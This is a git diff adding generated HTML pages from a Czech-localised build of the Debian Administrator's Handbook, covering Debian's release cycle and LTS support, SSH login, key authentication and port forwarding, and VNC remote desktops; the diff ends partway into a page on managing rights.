+              class="distribution distribution">Testing</span> must be approved. The goal here is to prevent any new version (and its new bugs), and to only approve updates fixing bugs.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.4.9.14.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/release-cycle.png"
+                  alt="A package's path through the various Debian versions" /></div></div><p
+              class="title"><strong>Obrázek 1.3. A package's path through the various Debian versions</strong></p></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Freeze: the home straight</strong></p></div></div></div><a
+              id="id-1.4.9.14.5.2"
+              class="indexterm"></a><div
+              class="para">
+				During the freeze period, development of the <span
+                class="distribution distribution">Testing</span> distribution is blocked; no more automatic updates are allowed. Only the Release Managers are then authorized to change packages, according to their own criteria. The purpose is to prevent the appearance of new bugs by introducing new versions; only thoroughly examined updates are authorized when they correct significant bugs.
+			</div></div><div
+            class="para">
+				After the release of a new stable version, the Stable Release Managers manage all further development (called “revisions”, ex: 7.1, 7.2, 7.3 for version 7). These updates systematically include all security patches. They will also include the most important corrections (the maintainer of a package must prove the gravity of the problem that they wish to correct in order to have their updates included).
+			</div><div
+            class="para">
+				At the end of the journey, our hypothetical package is now included in the stable distribution. This journey, not without its difficulties, explains the significant delays separating the Debian Stable releases. This contributes, over all, to its reputation for quality. Furthermore, the majority of users are satisfied using one of the three distributions simultaneously available. The system administrators, concerned above all about the stability of their servers, don't need the latest and greatest version of GNOME; they can choose Debian <span
+              class="distribution distribution">Stable</span>, and they will be satisfied. End users, more interested in the latest versions of GNOME or KDE Plasma than in rock-solid stability, will find Debian <span
+              class="distribution distribution">Testing</span> to be a good compromise between a lack of serious problems and relatively up to date software. Finally, developers and more experienced users may blaze the trail, testing all the latest developments in Debian <span
+              class="distribution distribution">Unstable</span> right out of the gate, at the risk of suffering the headaches and bugs inherent in any new version of a program. To each their own Debian!
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> GNOME and KDE Plasma, graphical desktop environments</strong></p></div></div></div><div
+              class="para">
+				GNOME (GNU Network Object Model Environment) and Plasma by KDE are the two most popular graphical desktop environments in the free software world. A desktop environment is a set of programs grouped together to allow easy management of the most common operations through a graphical interface. They generally include a file manager, office suite, web browser, e-mail program, multimedia accessories, etc. The most visible difference resides in the choice of the graphical library used: GNOME has chosen GTK+ (free software licensed under the LGPL), and the KDE community has selected Qt (a company-backed project, available nowadays both under the GPL and a commercial license). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.gnome.org/">https://www.gnome.org/</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.kde.org/">https://www.kde.org/</a></div>
+			</div></div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.4.9.14.9"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/package-lifecycle.png"
+                  alt="Chronological path of a program packaged by Debian" /></div></div><p
+              class="title"><strong>Obrázek 1.4. Chronological path of a program packaged by Debian</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.15"></a>1.6.5. The <span
+                    class="distribution distribution">Oldstable</span> and <span
+                    class="distribution distribution">Oldoldstable</span> Status</h3></div></div></div><a
+            id="id-1.4.9.15.2"
+            class="indexterm"></a><a
+            id="id-1.4.9.15.3"
+            class="indexterm"></a><div
+            class="para">
+				Each <span
+              class="distribution distribution">Stable</span> release has an expected lifetime of about 5 years and given that releases tend to happen every 2 years, there can be up to 3 supported releases at a given point of time. When a new stable release happens, the former release becomes <span
+              class="distribution distribution">Oldstable</span> and the one even before becomes <span
+              class="distribution distribution">Oldoldstable</span>.
+			</div><div
+            class="para">
+				This Long Term Support (LTS) of Debian releases is a recent initiative: individual contributors and companies joined forces to create the Debian LTS team. Older releases which are no longer supported by the Debian security team fall under the responsibility of this new team.
+			</div><div
+            class="para">
+				The Debian security team handles security support in the current <span
+              class="distribution distribution">Stable</span> release and also in the <span
+              class="distribution distribution">Oldstable</span> release (but only for as long as is needed to ensure one year of overlap with the current stable release). This amounts roughly to three years of support for each release. The Debian LTS team handles the last (two) years of security support so that each releases benefits from at least 5 years of support and so that users can upgrade from version N to N+2. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/LTS">https://wiki.debian.org/LTS</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>COMMUNITY</em></span> Companies sponsoring the LTS effort</strong></p></div></div></div><div
+              class="para">
+				Long Term Support is a difficult commitment to make in Debian because volunteers tend to avoid the work that is not very fun. And providing security support for 5 years old software is — for many contributors — a lot less fun than packaging new upstream versions or developing new features.
+			</div><div
+              class="para">
+				To bring this project to life, the project counted on the fact that long term support was particularly relevant for companies and that they would be willing to mutualize the cost of this security support.
+			</div><div
+              class="para">
+				The project started in June 2014: some organizations allowed their employees to contribute part-time to Debian LTS while others preferred to sponsor the project with money so that Debian contributors get paid to do the work that they would not do for free. Most Debian contributors willing to be paid to work on LTS got together to create a clear sponsorship offer managed by Freexian (Raphaël Hertzog's company): <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.freexian.com/services/debian-lts.html">https://www.freexian.com/services/debian-lts.html</a></div>
+			</div><div
+              class="para">
+				In the Debian LTS team, the volunteers work on packages they care about while the paid contributors prioritize packages used by their sponsors.
+			</div><div
+              class="para">
+				The project is always looking for new sponsors: What about your company? Can you let an employee work part-time on long term support? Can you allocate a small budget for security support? <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.debian.org/LTS/Funding">https://wiki.debian.org/LTS/Funding</a></div>
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.role-of-distributions.html"><strong>Předcházející</strong>1.5. The Role of Distributions</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="case-study.html"><strong>Další</strong>Kapitola 2. Presenting the Case Study</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.remote-login.html b/tmp/cs-CZ/html/sect.remote-login.html
new file mode 100644
index 000000000..c8ed9ca2e
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.remote-login.html
@@ -0,0 +1,444 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.2. Remote Login</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="next"
+        href="sect.rights-management.html"
+        title="9.3. Managing Rights" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.remote-login.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="unix-services.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rights-management.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.remote-login"></a>9.2. Remote Login</h2></div></div></div><div
+          class="para">
+			It is essential for an administrator to be able to connect to a computer remotely. Servers, confined in their own room, are rarely equipped with permanent keyboards and monitors — but they are connected to the network.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Client, server</strong></p></div></div></div><a
+            id="id-1.12.5.3.2"
+            class="indexterm"></a><a
+            id="id-1.12.5.3.3"
+            class="indexterm"></a><div
+            class="para">
+			A system where several processes communicate with each other is often described with the “client/server” metaphor. The server is the program that takes requests coming from a client and executes them. It is the client that controls operations, the server doesn't take any initiative of its own.
+		</div></div><a
+          id="id-1.12.5.4"
+          class="indexterm"></a><a
+          id="id-1.12.5.5"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ssh"></a>9.2.1. Secure Remote Login: SSH</h3></div></div></div><a
+            id="id-1.12.5.6.2"
+            class="indexterm"></a><a
+            id="id-1.12.5.6.3"
+            class="indexterm"></a><div
+            class="para">
+				The <span
+              class="emphasis"><em>SSH</em></span> (Secure SHell) protocol was designed with security and reliability in mind. Connections using SSH are secure: the partner is authenticated and all data exchanges are encrypted.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Telnet and RSH are obsolete</strong></p></div></div></div><a
+              id="id-1.12.5.6.5.2"
+              class="indexterm"></a><a
+              id="id-1.12.5.6.5.3"
+              class="indexterm"></a><div
+              class="para">
+				Before SSH, <span
+                class="emphasis"><em>Telnet</em></span> and <span
+                class="emphasis"><em>RSH</em></span> were the main tools used to login remotely. They are now largely obsolete and should no longer be used even if Debian still provides them.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Authentication, encryption</strong></p></div></div></div><div
+              class="para">
+				When you need to give a client the ability to conduct or trigger actions on a server, security is important. You must ensure the identity of the client; this is authentication. This identity usually consists of a password that must be kept secret, or any other client could get the password. This is the purpose of encryption, which is a form of encoding that allows two systems to communicate confidential information on a public channel while protecting it from being readable to others.
+			</div><div
+              class="para">
+				Authentication and encryption are often mentioned together, both because they are frequently used together, and because they are usually implemented with similar mathematical concepts.
+			</div></div><div
+            class="para">
+				SSH also offers two file transfer services. <code
+              class="command">scp</code> is a command line tool that can be used like <code
+              class="command">cp</code>, except that any path to another machine is prefixed with the machine's name, followed by a colon.
+			</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>scp file machine:/tmp/</code></strong></pre><div
+            class="para">
+				<code
+              class="command">sftp</code> is an interactive command, similar to <code
+              class="command">ftp</code>. In a single session, <code
+              class="command">sftp</code> can transfer several files, and it is possible to manipulate remote files with it (delete, rename, change permissions, etc.).
+			</div><a
+            id="id-1.12.5.6.10"
+            class="indexterm"></a><a
+            id="id-1.12.5.6.11"
+            class="indexterm"></a><div
+            class="para">
+				Debian uses OpenSSH, a free version of SSH maintained by the <code
+              class="command">OpenBSD</code> project (a free operating system based on the BSD kernel, focused on security) and fork of the original SSH software developed by the SSH Communications Security Corp company, of Finland. This company initially developed SSH as free software, but eventually decided to continue its development under a proprietary license. The OpenBSD project then created OpenSSH to maintain a free version of SSH.
+			</div><a
+            id="id-1.12.5.6.13"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> <span
+                        class="foreignphrase"><em
+                          class="foreignphrase">Fork</em></span></strong></p></div></div></div><a
+              id="id-1.12.5.6.14.2"
+              class="indexterm"></a><div
+              class="para">
+				A “fork”, in the software field, means a new project that starts as a clone of an existing project, and that will compete with it. From there on, both software will usually quickly diverge in terms of new developments. A fork is often the result of disagreements within the development team.
+			</div><div
+              class="para">
+				The option to fork a project is a direct result of the very nature of free software; a fork is a healthy event when it enables the continuation of a project as free software (for example in case of license changes). A fork arising from technical or personal disagreements is often a waste of human resources; another resolution would be preferable. Mergers of two projects that previously went through a prior fork are not unheard of.
+			</div></div><div
+            class="para">
+				OpenSSH is split into two packages: the client part is in the <span
+              class="pkg pkg">openssh-client</span> package, and the server is in the <span
+              class="pkg pkg">openssh-server</span> package. The <span
+              class="pkg pkg">ssh</span> meta-package depends on both parts and facilitates installation of both (<code
+              class="command">apt install ssh</code>).
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ssh-key-based-auth"></a>9.2.1.1. Key-Based Authentication</h4></div></div></div><div
+              class="para">
+					Each time someone logs in over SSH, the remote server asks for a password to authenticate the user. This can be problematic if you want to automate a connection, or if you use a tool that requires frequent connections over SSH. This is why SSH offers a key-based authentication system.
+				</div><div
+              class="para">
+					The user generates a key pair on the client machine with <code
+                class="command">ssh-keygen -t rsa</code>; the public key is stored in <code
+                class="filename">~/.ssh/id_rsa.pub</code>, while the corresponding private key is stored in <code
+                class="filename">~/.ssh/id_rsa</code>. The user then uses <code
+                class="command">ssh-copy-id <em
+                  class="replaceable">server</em></code> to add their public key to the <code
+                class="filename">~/.ssh/authorized_keys</code> file on the server. If the private key was not protected with a “passphrase” at the time of its creation, all subsequent logins on the server will work without a password. Otherwise, the private key must be decrypted each time by entering the passphrase. Fortunately, <code
+                class="command">ssh-agent</code> allows us to keep private keys in memory to not have to regularly re-enter the password. For this, you simply use <code
+                class="command">ssh-add</code> (once per work session) provided that the session is already associated with a functional instance of <code
+                class="command">ssh-agent</code>. Debian activates it by default in graphical sessions, but this can be deactivated by changing <code
+                class="filename">/etc/X11/Xsession.options</code>. For a console session, you can manually start it with <code
+                class="command">eval $(ssh-agent)</code>.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> Protection of the private key</strong></p></div></div></div><div
+                class="para">
+					Whoever has the private key can login on the account thus configured. This is why access to the private key is protected by a “passphrase”. Someone who acquires a copy of a private key file (for example, <code
+                  class="filename">~/.ssh/id_rsa</code>) still has to know this phrase in order to be able to use it. This additional protection is not, however, impregnable, and if you think that this file has been compromised, it is best to disable that key on the computers in which it has been installed (by removing it from the <code
+                  class="filename">authorized_keys</code> files) and replacing it with a newly generated key.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> OpenSSL flaw in Debian <span
+                          class="distribution distribution">Etch</span></strong></p></div></div></div><div
+                class="para">
+					The OpenSSL library, as initially provided in Debian <span
+                  class="distribution distribution">Etch</span>, had a serious problem in its random number generator (RNG). Indeed, the Debian maintainer had made a change so that applications using it would no longer generate warnings when analyzed by memory testing tools like <code
+                  class="command">valgrind</code>. Unfortunately, this change also meant that the RNG was employing only one source of entropy corresponding to the process number (PID) whose 32,000 possible values do not offer enough randomness. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.debian.org/security/2008/dsa-1571">http://www.debian.org/security/2008/dsa-1571</a></div>
+				</div><div
+                class="para">
+					Specifically, whenever OpenSSL was used to generate a key, it always produced a key within a known set of hundreds of thousands of keys (32,000 multiplied by a small number of key lengths). This affected SSH keys, SSL keys, and X.509 certificates used by numerous applications, such as OpenVPN. A cracker had only to try all of the keys to gain unauthorized access. To reduce the impact of the problem, the SSH daemon was modified to refuse problematic keys that are listed in the <span
+                  class="pkg pkg">openssh-blacklist</span> and <span
+                  class="pkg pkg">openssh-blacklist-extra</span> packages. Additionally, the <code
+                  class="command">ssh-vulnkey</code> command allows identification of possibly compromised keys in the system.
+				</div><div
+                class="para">
+					A more thorough analysis of this incident brings to light that it is the result of multiple (small) problems, both within the OpenSSL project and with the Debian package maintainer. A widely used library like OpenSSL should — without modifications — not generate warnings when tested by <code
+                  class="command">valgrind</code>. Furthermore, the code (especially the parts as sensitive as the RNG) should be better commented to prevent such errors. On Debian's side, the maintainer wanted to validate the modifications with the OpenSSL developers, but simply explained the modifications without providing the corresponding patch to review and failed to mention his role within Debian. Finally, the maintenance choices were sub-optimal: the changes made to the original code were not clearly documented; all the modifications were effectively stored in a Subversion repository, but they ended up all lumped into one single patch during creation of the source package.
+				</div><div
+                class="para">
+					It is difficult under such conditions to find the corrective measures to prevent such incidents from recurring. The lesson to be learned here is that every divergence Debian introduces to upstream software must be justified, documented, submitted to the upstream project when possible, and widely publicized. It is from this perspective that the new source package format (“3.0 (quilt)”) and the Debian sources webservice were developed. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://sources.debian.org">http://sources.debian.org</a></div>
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ssh-x11"></a>9.2.1.2. Using Remote X11 Applications</h4></div></div></div><div
+              class="para">
+					The SSH protocol allows forwarding of graphical data (“X11” session, from the name of the most widespread graphical system in Unix); the server then keeps a dedicated channel for those data. Specifically, a graphical program executed remotely can be displayed on the X.org server of the local screen, and the whole session (input and display) will be secure. Since this feature allows remote applications to interfere with the local system, it is disabled by default. You can enable it by specifying <code
+                class="literal">X11Forwarding yes</code> in the server configuration file (<code
+                class="filename">/etc/ssh/sshd_config</code>). Finally, the user must also request it by adding the <code
+                class="literal">-X</code> option to the <code
+                class="command">ssh</code> command-line.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ssh-port-forwarding"></a>9.2.1.3. Creating Encrypted Tunnels with Port Forwarding</h4></div></div></div><a
+              id="id-1.12.5.6.18.2"
+              class="indexterm"></a><div
+              class="para">
+					Its <code
+                class="literal">-R</code> and <code
+                class="literal">-L</code> options allow <code
+                class="command">ssh</code> to create “encrypted tunnels” between two machines, securely forwarding a local TCP port (see sidebar <a
+                class="xref"
+                href="network-infrastructure.html#sidebar.tcp-udp"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> TCP/UDP</a>) to a remote machine or vice versa.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Tunnel</strong></p></div></div></div><a
+                id="id-1.12.5.6.18.4.2"
+                class="indexterm"></a><a
+                id="id-1.12.5.6.18.4.3"
+                class="indexterm"></a><div
+                class="para">
+					The Internet, and most LANs that are connected to it, operate in packet mode and not in connected mode, meaning that a packet issued from one computer to another is going to be stopped at several intermediary routers to find its way to its destination. You can still simulate a connected operation where the stream is encapsulated in normal IP packets. These packets follow their usual route, but the stream is reconstructed unchanged at the destination. We call this a “tunnel”, analogous to a road tunnel in which vehicles drive directly from the entrance (input) to the exit (output) without encountering any intersections, as opposed to a path on the surface that would involve intersections and changing direction.
+				</div><div
+                class="para">
+					You can use this opportunity to add encryption to the tunnel: the stream that flows through it is then unrecognizable from the outside, but it is returned in decrypted form at the exit of the tunnel.
+				</div></div><div
+              class="para">
+					<code
+                class="command">ssh -L 8000:server:25 intermediary</code> establishes an SSH session with the <em
+                class="replaceable">intermediary</em> host and listens to local port 8000 (see <a
+                class="xref"
+                href="sect.remote-login.html#figure.ssh-L">9.3 – „Forwarding a local port with SSH“</a>). For any connection established on this port, <code
+                class="command">ssh</code> will initiate a connection from the <em
+                class="replaceable">intermediary</em> computer to port 25 on the <em
+                class="replaceable">server</em>, and will bind both connections together.
+				</div><div
+              class="para">
+					<code
+                class="command">ssh -R 8000:server:25 intermediary</code> also establishes an SSH session to the <em
+                class="replaceable">intermediary</em> computer, but it is on this machine that <code
+                class="command">ssh</code> listens to port 8000 (see <a
+                class="xref"
+                href="sect.remote-login.html#figure.ssh-R">9.4 – „Forwarding a remote port with SSH“</a>). Any connection established on this port will cause <code
+                class="command">ssh</code> to open a connection from the local machine on to port 25 of the <em
+                class="replaceable">server</em>, and to bind both connections together.
+				</div><div
+              class="para">
+					In both cases, connections are made to port 25 on the <em
+                class="replaceable">server</em> host, which pass through the SSH tunnel established between the local machine and the <em
+                class="replaceable">intermediary</em> machine. In the first case, the entrance to the tunnel is local port 8000, and the data move towards the <em
+                class="replaceable">intermediary</em> machine before being directed to the <em
+                class="replaceable">server</em> on the “public” network. In the second case, the input and output in the tunnel are reversed; the entrance is port 8000 on the <em
+                class="replaceable">intermediary</em> machine, the output is on the local host, and the data are then directed to the <em
+                class="replaceable">server</em>. In practice, the server is usually either the local machine or the intermediary. That way SSH secures the connection from one end to the other.
+				</div><div
+              class="figure"><a
+                xmlns=""
+                id="figure.ssh-L"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/ssh-L.png"
+                    alt="Forwarding a local port with SSH" /></div></div><p
+                class="title"><strong>Obrázek 9.3. Forwarding a local port with SSH</strong></p></div><div
+              class="figure"><a
+                xmlns=""
+                id="figure.ssh-R"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/ssh-R.png"
+                    alt="Forwarding a remote port with SSH" /></div></div><p
+                class="title"><strong>Obrázek 9.4. Forwarding a remote port with SSH</strong></p></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.remote-desktops"></a>9.2.2. Using Remote Graphical Desktops</h3></div></div></div><div
+            class="para">
+				VNC (Virtual Network Computing) allows remote access to graphical desktops.
+			</div><a
+            id="id-1.12.5.7.3"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.4"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.5"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.6"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.7"
+            class="indexterm"></a><div
+            class="para">
+				This tool is mostly used for technical assistance; the administrator can see the errors that the user is facing, and show them the correct course of action without having to stand by them.
+			</div><a
+            id="id-1.12.5.7.9"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.10"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.11"
+            class="indexterm"></a><div
+            class="para">
+				First, the user must authorize sharing their session. The GNOME graphical desktop environment in <span
+              class="distribution distribution">Jessie</span> includes that option in its configuration panel (contrary to previous versions of Debian, where the user had to install and run <code
+              class="command">vino</code>). KDE Plasma still requires using <code
+              class="command">krfb</code> to allow sharing an existing session over VNC. For other graphical desktop environments, the <code
+              class="command">x11vnc</code> command (from the Debian package of the same name) serves the same purpose; you can make it available to the user with an explicit icon.
+			</div><a
+            id="id-1.12.5.7.13"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.14"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.15"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.16"
+            class="indexterm"></a><div
+            class="para">
+				When the graphical session is made available by VNC, the administrator must connect to it with a VNC client. GNOME has <code
+              class="command">vinagre</code> and <code
+              class="command">remmina</code> for that, while the KDE project provides <code
+              class="command">krdc</code> (in the menu at <span
+              class="guimenu"><strong>K</strong></span> → <span
+              class="guisubmenu"><strong>Internet</strong></span> → <span
+              class="guimenuitem"><strong>Remote Desktop Client</strong></span>). There are other VNC clients that use the command line, such as <code
+              class="command">xvnc4viewer</code> in the Debian package of the same name. Once connected, the administrator can see what is going on, work on the machine remotely, and show the user how to proceed.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> VNC over SSH</strong></p></div></div></div><a
+              id="id-1.12.5.7.18.2"
+              class="indexterm"></a><div
+              class="para">
+				If you want to connect by VNC, and you don't want your data sent in clear text on the network, it is possible to encapsulate the data in an SSH tunnel (see <a
+                class="xref"
+                href="sect.remote-login.html#sect.ssh-port-forwarding">9.2.1.3 – „Creating Encrypted Tunnels with Port Forwarding“</a>). You simply have to know that VNC uses port 5900 by default for the first screen (called “localhost:0”), 5901 for the second (called “localhost:1”), etc.
+			</div><div
+              class="para">
+				The <code
+                class="command">ssh -L localhost:5901:localhost:5900 -N -T <em
+                  class="replaceable">machine</em></code> command creates a tunnel between local port 5901 in the localhost interface and port 5900 of the <em
+                class="replaceable">machine</em> host. The first “localhost” restricts SSH to listening to only that interface on the local machine. The second “localhost” indicates the interface on the remote machine which will receive the network traffic entering in “localhost:5901”. Thus <code
+                class="command">vncviewer localhost:1</code> will connect the VNC client to the remote screen, even though you indicate the name of the local machine.
+			</div><div
+              class="para">
+				When the VNC session is closed, remember to close the tunnel by also quitting the corresponding SSH session.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Display manager</strong></p></div></div></div><a
+              id="id-1.12.5.7.19.2"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.3"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.4"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.5"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.6"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.7"
+              class="indexterm"></a><div
+              class="para">
+				<code
+                class="command">gdm3</code>, <code
+                class="command">kdm</code>, <code
+                class="command">lightdm</code>, and <code
+                class="command">xdm</code> are Display Managers. They take control of the graphical interface shortly after boot in order to provide the user a login screen. Once the user has logged in, they execute the programs needed to start a graphical work session.
+			</div></div><div
+            class="para">
+				VNC also works for mobile users, or company executives, who occasionally need to login from their home to access a remote desktop similar to the one they use at work. The configuration of such a service is more complicated: you first install the <span
+              class="pkg pkg">vnc4server</span> package, change the configuration of the display manager to accept <code
+              class="literal">XDMCP Query</code> requests (for <code
+              class="command">gdm3</code>, this can be done by adding <code
+              class="literal">Enable=true</code> in the “xdmcp” section of <code
+              class="filename">/etc/gdm3/daemon.conf</code>), and finally, start the VNC server with <code
+              class="command">inetd</code> so that a session is automatically started when a user tries to login. For example, you may add this line to <code
+              class="filename">/etc/inetd.conf</code>:
+			</div><pre
+            class="programlisting">5950  stream  tcp  nowait  nobody.tty  /usr/bin/Xvnc Xvnc -inetd -query localhost -once -geometry 1024x768 -depth 16 securitytypes=none
+</pre><div
+            class="para">
+				Redirecting incoming connections to the display manager solves the problem of authentication, because only users with local accounts will pass the <code
+              class="command">gdm3</code> login screen (or equivalent <code
+              class="command">kdm</code>, <code
+              class="command">xdm</code>, etc.). As this operation allows multiple simultaneous logins without any problem (provided the server is powerful enough), it can even be used to provide complete desktops for mobile users (or for less powerful desktop systems, configured as thin clients). Users simply login to the server's screen with <code
+              class="command">vncviewer <em
+                class="replaceable">server</em>:50</code>, because the port used is 5950.
+			</div><a
+            id="id-1.12.5.7.23"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="unix-services.html"><strong>Předcházející</strong>Kapitola 9. Unix Services</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rights-management.html"><strong>Další</strong>9.3. Managing Rights</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.rights-management.html b/tmp/cs-CZ/html/sect.rights-management.html
new file mode 100644
index 000000000..c2b87043c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.rights-management.html
@@ -0,0 +1,309 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.3. Managing Rights</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
